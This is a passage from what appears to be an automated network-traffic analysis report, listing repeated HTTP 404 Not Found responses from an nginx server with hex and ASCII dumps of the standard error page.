Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
